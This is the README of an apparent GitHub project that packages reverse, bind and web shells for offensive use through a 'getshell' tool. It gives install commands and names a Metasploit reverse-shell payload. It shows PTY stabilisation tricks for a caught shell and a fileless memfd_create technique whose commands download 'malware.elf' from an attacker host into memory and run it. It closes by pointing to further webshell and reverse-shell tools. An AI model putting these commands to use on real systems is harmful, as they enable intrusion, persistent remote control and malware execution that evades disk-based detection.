
Collection of Reverse, Bind & Web Shells

Primary LanguagePHPMIT LicenseMIT



A collection of reverse, bind and web shells from all over the internet.


a) With pipx.

pipx install git+https://github.com/dadevel/shells.git@main

b) With pip.

pip install --user git+https://github.com/dadevel/shells.git@main


Just run getshell and select one of the many templates.

Some advanced templates require manual steps:


Metasploit payloads like windows/shell_reverse_tcp are one of the few reverse shells for Windows that support interactive commands.

Linux PTY

Spawn a PTY and stabilize your shell with Python.

python -c 'import pty;pty.spawn("/bin/bash")'
# ctrl+z
echo "stty sane;stty rows $LINES cols $COLUMNS;export TERM=xterm;" | xclip -sel clip
stty raw -echo && fg
# paste clipboard and press enter

Alternatively spawn a PTY with script.

script -q -c /bin/bash /dev/null

Linux memfd_create()

Create file in memory with Python 3.8 or newer (source).

$ python3 -c "from os import*;fork()or(setsid(),print(f'/proc/{getpid()}/fd/{memfd_create(sep)}'),kill(0,19))"
$ curl -o /proc/139856/fd/3 https://attacker.com/malware.elf
$ /proc/139856/fd/3

Other interesting tools

  • Kraken, multi-language webshell
  • xc, reverse shell for Linux and Windows written in Go